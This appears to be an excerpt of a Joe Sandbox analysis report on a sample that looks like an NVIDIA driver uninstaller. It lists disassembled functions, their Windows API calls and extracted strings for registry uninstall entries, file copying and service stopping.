                                  • String ID: %s%s then set AddRegName = 1$%s;%s$%s\%s$AddRegName$Could not allocate memory for szName and pValue$Current subkey: %s$Elements inside g_ClassRegNamelist: %s$Enumerating Reg Path:%s$Number of elements inside g_ClassRegNamelist:%d$Number of reg names: %d$Number of subkeys: %d$Placing back the original Class Path$Properties$SYSTEM\CurrentControlSet\Control\Class\%s$UninstCommandClass::QueryClassKeyNamesForDelete(%s,%s)$g_ClassRegNamelist has reached its max level to store the names(count = %d). Will delete the current elements and query the names again!$if %s$set AddRegName = 0
                                  • API String ID: 3036669454-2600806413
                                  • Opcode ID: 086fde4d80a9bbb1f370b895d89e5fc441152799c355e70df2753f167852a350
                                  • Instruction ID: e6ac811c559bc8d032189b53aefd3f363a27f70811a303a82ce0f4d073b03dd9
                                  • Opcode Fuzzy Hash: 086fde4d80a9bbb1f370b895d89e5fc441152799c355e70df2753f167852a350
                                  • Instruction Fuzzy Hash: CCC1A6B1608340ABD310DB55DC41FABB7E8ABC5704F54492EF685A22C1E778E944C7AF
                                  Function 00402D20 Relevance: 45.8, APIs: 7, Strings: 19, Instructions: 276COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 00402D8E
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf_memset_sprintf
                                  • String ID: bCheckForValue = %s$ bDidTimeout = %s$ szKeyRoot = %s$ szSubkey = %s$ szTimeoutCommand = %s$ szValue = %s$CommandClass::WaitOnRegDel$FALSE$HKCC$HKCR$HKCU$HKDD$HKLM$HKUS$TRUE$WaitOnDelReg results:$WaitOnRegDel: Invalid number of arguments$WaitOnRegDel: Invalid registry key root$WaitOnRegDel: Invalid registry key root syntax
                                  • API String ID: 3581153556-148030620
                                  • Opcode ID: 0c2bee4b016be6b5afac4339a7d9fab88f07d74409dc677235fbc8b78b3b20d7
                                  • Instruction ID: a20e350dd2257d438604c942a6acaa6838358867acf3accdf5b35ffb40d3d4e0
                                  • Opcode Fuzzy Hash: 0c2bee4b016be6b5afac4339a7d9fab88f07d74409dc677235fbc8b78b3b20d7
                                  • Instruction Fuzzy Hash: 73A1D5715483419BE320DB25CD46F9B7BE89F94308F14493EF584672C2E7BC964887EA
                                  Function 00405A50 Relevance: 45.6, APIs: 7, Strings: 19, Instructions: 147COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 00405A9A
                                  • _sprintf.LIBCMT ref: 00405B04
                                  • _memset.LIBCMT ref: 00405B24
                                  • _sprintf.LIBCMT ref: 00405B5C
                                  • _sprintf.LIBCMT ref: 00405B7C
                                  • _sprintf.LIBCMT ref: 00405B9C
                                  • _sprintf.LIBCMT ref: 00405BBC
                                    • Part of subcall function 00401820: _sprintf.LIBCMT ref: 0040186E
                                  Strings
                                  • copy {Given File} ,{sysdir}\\{Uninstall File}, xrefs: 00405C06
                                  • Uninstall File, xrefs: 00405AD2, 00405BFA
                                  • Setreg {NVUninst_RegKey}\MinorVersion=%d, xrefs: 00405B76
                                  • Setreg {NVUninst_RegKey}\MajorVersion=%d, xrefs: 00405B56
                                  • Display Name, xrefs: 00405ABB
                                  • Setreg {NVUninst_RegKey}\DisplayVersion=%d.%d, xrefs: 00405AFE
                                  • Setreg {NVUninst_RegKey}\Publisher=NVIDIA Corporation, xrefs: 00405B2C
                                  • Setreg {NVUninst_RegKey}\UninstallString={sysdir}\nvuninst.exe UninstallGUI, xrefs: 00405B38
                                  • Setreg {NVUninst_RegKey}\InstallLocation={sysdir}, xrefs: 00405B44
                                  • Setreg {NVUninst_RegKey}\VersionMinor=%d, xrefs: 00405BB6
                                  • Setreg {NVCompList_RegKey}\{Uninstall File}={Display Name}, xrefs: 00405BDC
                                  • Given File, xrefs: 00405BEB
                                  • Setreg {NVUninst_RegKey}\VersionMajor=%d, xrefs: 00405B96
                                  • Setreg {NVUninst_RegKey}\DisplayName=NVIDIA Drivers, xrefs: 00405AEA
                                  • AddUninstall: invalid number of arguments, xrefs: 00405AA6
                                  • UninstCommandClass::AddUninstall, xrefs: 00405A6E
                                  • call {Given File} ,OnAddUninstall, xrefs: 00405C12
                                  • Setreg {NVCompList_RegKey}, xrefs: 00405BD0
                                  • Setreg {NVUninst_RegKey}\DisplayIcon={sysdir}\nvuninst.exe, xrefs: 00405ADE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _sprintf$Time_fputs_memset$DebugFormatLocalMutexObjectOutputReleaseSingleStringWait_fprintf
                                  • String ID: AddUninstall: invalid number of arguments$Display Name$Given File$Setreg {NVCompList_RegKey}$Setreg {NVCompList_RegKey}\{Uninstall File}={Display Name}$Setreg {NVUninst_RegKey}\DisplayIcon={sysdir}\nvuninst.exe$Setreg {NVUninst_RegKey}\DisplayName=NVIDIA Drivers$Setreg {NVUninst_RegKey}\DisplayVersion=%d.%d$Setreg {NVUninst_RegKey}\InstallLocation={sysdir}$Setreg {NVUninst_RegKey}\MajorVersion=%d$Setreg {NVUninst_RegKey}\MinorVersion=%d$Setreg {NVUninst_RegKey}\Publisher=NVIDIA Corporation$Setreg {NVUninst_RegKey}\UninstallString={sysdir}\nvuninst.exe UninstallGUI$Setreg {NVUninst_RegKey}\VersionMajor=%d$Setreg {NVUninst_RegKey}\VersionMinor=%d$UninstCommandClass::AddUninstall$Uninstall File$call {Given File} ,OnAddUninstall$copy {Given File} ,{sysdir}\\{Uninstall File}
                                  • API String ID: 101094915-2970831575
                                  • Opcode ID: 270da3f20b738c392aece5049fac7e8f05163da4b26f4d16f491f3f59e00e591
                                  • Instruction ID: bdcf4a2cc4be200e0c32bc6dc9db4d159cab1f0be96d6201973e7b70083f8e5a
                                  • Opcode Fuzzy Hash: 270da3f20b738c392aece5049fac7e8f05163da4b26f4d16f491f3f59e00e591
                                  • Instruction Fuzzy Hash: 41418EF1B44710B7D606F6624C67FAF725A5B94B08F40042FB905B62C2EAFCA64582DE
                                  Function 00408D00 Relevance: 40.5, APIs: 5, Strings: 18, Instructions: 246windowCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _sprintf.LIBCMT ref: 00408E91
                                    • Part of subcall function 00401C90: _sprintf.LIBCMT ref: 00401D29
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • _sprintf.LIBCMT ref: 00408F48
                                  • MessageBoxA.USER32(00000000,?,?,00000004), ref: 00408F60
                                  • GetDesktopWindow.USER32 ref: 00408F6B
                                  • ShowWindow.USER32(00000000,00000000), ref: 00408FA9
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _sprintf$TimeWindow_fputs$DebugDesktopFormatLocalMessageMutexObjectOutputReleaseShowSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: %11%\$%s\%s$Delreg {NVCompList_RegKey}\{NVU File}$DevInstanceID$Getreg Uninstall Title={NVCompList_RegKey}\{NVU File}$LeaveDriverStoreCache$NVU File$Setreg {NVCompList_RegKey}\{NVU File}={UNINSTALL_TAG}$Silent$SuppressUninstConfirm$UNINSTALL IN PROGRESS$UninstCommandClass:: Leave Driver Store Cache defined$UninstCommandClass:: Suppress Uninstall Confirm dialog defined$UninstCommandClass::Uninstall$Uninstall Title$Uninstall: invalid number of arguments$Yes$sysdir
                                  • API String ID: 3453233080-788238558
                                  • Opcode ID: 6724542c8fa51cf112fa10735b7c7cf7ab934b14dc5837b65e01614406380ffd
                                  • Instruction ID: 8e379383620130e4ce8354618683d6d3a2a41f9b49f3042cafe3c21d07fa54a2
                                  • Opcode Fuzzy Hash: 6724542c8fa51cf112fa10735b7c7cf7ab934b14dc5837b65e01614406380ffd
                                  • Instruction Fuzzy Hash: 8F611F7174470427D61066364E12BAF768A8B94B48F14053FFD45B73C3EEBDAA05429E
                                  Function 00408800 Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 188COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 0040BBAC: __mbsicmp_l.LIBCMT ref: 0040BBB6
                                  • GetFileAttributesA.KERNEL32(?), ref: 004088A0
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  Strings
                                  • UninstCommandClass::NvCopyFile - Copy failed, xrefs: 00408963, 00408A3F
                                  • UninstCommandClass::NvCopyFile - Source and destination are identical, skipping copy, xrefs: 0040887B
                                  • NvCopyFile: source file doesn't exist, xrefs: 004088B1
                                  • NvCopyFile: invalid number of arguments, xrefs: 0040884B
                                  • NvCopyFile: second parameter is a directory instead of a file, xrefs: 004088EC
                                  • %s\%s, xrefs: 004089C3
                                  • NULL, xrefs: 00408825, 00408920, 0040892F, 004089EB
                                  • UninstCommandClass::NvCopyFile(%s), xrefs: 0040882B
                                  • UninstCommandClass::NvCopyFile - Source file doesn't exist, xrefs: 004088A7
                                  • UninstCommandClass::NvCopyFile - Copying file %s to %s, xrefs: 00408936, 004089F6
                                  • UninstCommandClass::NvCopyFile - Second parameter is a directory instead of a file, xrefs: 004088E2
                                  • %c:\NV%d%d.TMP, xrefs: 0040898F
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Time_fputs$AttributesDebugFileFormatLocalMutexObjectOutputReleaseSingleStringWait__mbsicmp_l_fprintf
                                  • String ID: %c:\NV%d%d.TMP$%s\%s$NULL$NvCopyFile: invalid number of arguments$NvCopyFile: second parameter is a directory instead of a file$NvCopyFile: source file doesn't exist$UninstCommandClass::NvCopyFile - Copy failed$UninstCommandClass::NvCopyFile - Copying file %s to %s$UninstCommandClass::NvCopyFile - Second parameter is a directory instead of a file$UninstCommandClass::NvCopyFile - Source and destination are identical, skipping copy$UninstCommandClass::NvCopyFile - Source file doesn't exist$UninstCommandClass::NvCopyFile(%s)
                                  • API String ID: 1124541442-2715538906
                                  • Opcode ID: 9734b5d4dffe0bae3d55f4b0521468c02516e100f1bf8c9a5c0f3d24613342c2
                                  • Instruction ID: a039133c0ba5b34cc6e709e53d9ccfbde3f5d274a045da983b11c6e2e660d430
                                  • Opcode Fuzzy Hash: 9734b5d4dffe0bae3d55f4b0521468c02516e100f1bf8c9a5c0f3d24613342c2
                                  • Instruction Fuzzy Hash: DC51A5B67003006BD220B7759D82FEB73999F94704F00493FF695E22C1EB7CA94586AE
                                  Function 004057E0 Relevance: 40.4, APIs: 14, Strings: 9, Instructions: 150servicesleepCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 0040581D
                                  • SetLastError.KERNEL32(00000000), ref: 00405832
                                  • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 0040583F
                                  • ControlService.ADVAPI32(00000000,?,?), ref: 00405868
                                  • Sleep.KERNEL32(000001F4), ref: 004058A4
                                  • QueryServiceStatus.ADVAPI32(00000000,?), ref: 004058AC
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 004058D3
                                  • CloseServiceHandle.ADVAPI32(?), ref: 004058DE
                                  • GetLastError.KERNEL32(?), ref: 004058F1
                                  • CloseServiceHandle.ADVAPI32(00000000), ref: 0040590A
                                  • CloseServiceHandle.ADVAPI32(?), ref: 00405915
                                  • GetLastError.KERNEL32 ref: 00405927
                                  • CloseServiceHandle.ADVAPI32(?), ref: 00405948
                                  • CloseServiceHandle.ADVAPI32(?), ref: 0040597A
                                  Strings
                                  • Failed to stop service %s. Error code %d. Service state is %d., xrefs: 004058F9
                                  • (, xrefs: 00405882
                                  • Attempting to stop service %s., xrefs: 00405850
                                  • Failed to get service handle. Error code %d., xrefs: 0040595B
                                  • UninstCommandClass::StopServiceCallBack, xrefs: 004057E7
                                  • Service Name: %s, xrefs: 004057F8
                                  • Service Stop Code: %d., xrefs: 00405807
                                  • Service %s stopped., xrefs: 004058C3
                                  • Service does not exist., xrefs: 00405934
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: Service$CloseHandle$ErrorLast$OpenTime_fputs$ControlDebugFormatLocalManagerMutexObjectOutputQueryReleaseSingleSleepStatusStringWait_fprintf
                                  • String ID: ($Attempting to stop service %s.$Failed to get service handle. Error code %d.$Failed to stop service %s. Error code %d. Service state is %d.$Service %s stopped.$Service Name: %s$Service Stop Code: %d.$Service does not exist.$UninstCommandClass::StopServiceCallBack
                                  • API String ID: 2163033816-2479115717
                                  • Opcode ID: 5c8a80000254f0ccf3913f23c6a399ff9ff86d5b32e86fc5e50433ea2e46882c
                                  • Instruction ID: 8f8719483fb8023f7a8bf69f7c882357ac86cee1ca1fbeda934c7e2b16d0d67b
                                  • Opcode Fuzzy Hash: 5c8a80000254f0ccf3913f23c6a399ff9ff86d5b32e86fc5e50433ea2e46882c
                                  • Instruction Fuzzy Hash: 0741E772740310ABC210BFA5EC45DABBB9CEB94762F40453FF91192291DB799D048BFA
                                  Function 0040AF90 Relevance: 40.4, APIs: 7, Strings: 16, Instructions: 147COMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00403E70: WaitForSingleObject.KERNEL32(?,000000FF,?,0040100D,CommandClass::GetResourceString), ref: 00403E9E
                                    • Part of subcall function 00403E70: OutputDebugStringA.KERNEL32(?), ref: 00403ECC
                                    • Part of subcall function 00403E70: GetLocalTime.KERNEL32(?), ref: 00403EF3
                                    • Part of subcall function 00403E70: GetTimeFormatA.KERNEL32(00000800,00000000,?,hh':'mm':'ss tt,?,00000400), ref: 00403F14
                                    • Part of subcall function 00403E70: _fprintf.LIBCMT ref: 00403F35
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F56
                                    • Part of subcall function 00403E70: _fputs.LIBCMT ref: 00403F75
                                    • Part of subcall function 00403E70: ReleaseMutex.KERNEL32(?), ref: 00403F91
                                  • _memset.LIBCMT ref: 0040AFD9
                                    • Part of subcall function 00401A50: FindFirstFileA.KERNEL32(?,?), ref: 00401ACA
                                    • Part of subcall function 00401A50: SetLastError.KERNEL32(00000000), ref: 00401ADA
                                    • Part of subcall function 00401A50: GetLastError.KERNEL32 ref: 00401AE6
                                    • Part of subcall function 00401A50: FindNextFileA.KERNEL32(00000000,?), ref: 00401B1C
                                    • Part of subcall function 00401A50: GetLastError.KERNEL32 ref: 00401B22
                                    • Part of subcall function 00401A50: FindClose.KERNEL32(00000000), ref: 00401B2A
                                  • _sprintf.LIBCMT ref: 0040B022
                                  • _memset.LIBCMT ref: 0040B042
                                  • _sprintf.LIBCMT ref: 0040B085
                                    • Part of subcall function 0040C051: __output_l.LIBCMT ref: 0040C0A4
                                  • _sprintf.LIBCMT ref: 0040B0A5
                                    • Part of subcall function 0040C051: __flsbuf.LIBCMT ref: 0040C0BF
                                  • _sprintf.LIBCMT ref: 0040B0C5
                                  • _sprintf.LIBCMT ref: 0040B0E5
                                  Strings
                                  • Setreg {NVUninst_RegKey}\MinorVersion=%d, xrefs: 0040B09F
                                  • Setreg {NVUninst_RegKey}\MajorVersion=%d, xrefs: 0040B07F
                                  • {sysdir}\*.nvu, xrefs: 0040B105
                                  • Setreg {NVUninst_RegKey}\UninstallString={sysdir}\{current parser name} UninstallGUI, xrefs: 0040B055
                                  • Setreg {NVUninst_RegKey}\DisplayVersion=%d.%d, xrefs: 0040B01C
                                  • {sysdir}\nvu*.exe, xrefs: 0040AFB5
                                  • Setreg {NVUninst_RegKey}\Publisher=NVIDIA Corporation, xrefs: 0040B061
                                  • Setreg {NVUninst_RegKey}\InstallLocation={sysdir}, xrefs: 0040B06D
                                  • Setreg {NVUninst_RegKey}\VersionMinor=%d, xrefs: 0040B0DF
                                  • Setreg {NVUninst_RegKey}\VersionMajor=%d, xrefs: 0040B0BF
                                  • Setreg {NVUninst_RegKey}\DisplayName=NVIDIA Drivers, xrefs: 0040B008
                                  • SetReg {NVUninst_RegKey}\UninstDataVerified=1, xrefs: 0040B15C
                                  • {UninstRegkey}\{*}, xrefs: 0040B12B
                                  • Setreg {NVCompList_RegKey}, xrefs: 0040B0F9
                                  • Setreg {NVUninst_RegKey}\DisplayIcon={sysdir}\nvuninst.exe, xrefs: 0040AFFC
                                  • UninstCommandClass::ReConfig2UseUninstGUI, xrefs: 0040AFA6
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1518095116.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.1518070137.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518129372.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518178773.000000000040F000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518210510.000000000041B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518234022.000000000041C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518274310.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518374395.000000000042D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518427260.000000000047B000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518475238.000000000047C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.1518530003.000000000048C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_LisectAVT_2403002B_38.jbxd
                                  Similarity
                                  • API ID: _sprintf$ErrorFindLast$FileTime_fputs_memset$CloseDebugFirstFormatLocalMutexNextObjectOutputReleaseSingleStringWait__flsbuf__output_l_fprintf
                                  • String ID: SetReg {NVUninst_RegKey}\UninstDataVerified=1$Setreg {NVCompList_RegKey}$Setreg {NVUninst_RegKey}\DisplayIcon={sysdir}\nvuninst.exe$Setreg {NVUninst_RegKey}\DisplayName=NVIDIA Drivers$Setreg {NVUninst_RegKey}\DisplayVersion=%d.%d$Setreg {NVUninst_RegKey}\InstallLocation={sysdir}$Setreg {NVUninst_RegKey}\MajorVersion=%d$Setreg {NVUninst_RegKey}\MinorVersion=%d$Setreg {NVUninst_RegKey}\Publisher=NVIDIA Corporation$Setreg {NVUninst_RegKey}\UninstallString={sysdir}\{current parser name} UninstallGUI$Setreg {NVUninst_RegKey}\VersionMajor=%d$Setreg {NVUninst_RegKey}\VersionMinor=%d$UninstCommandClass::ReConfig2UseUninstGUI${UninstRegkey}\{*}${sysdir}\*.nvu${sysdir}\nvu*.exe
                                  • API String ID: 4073646355-2385717040
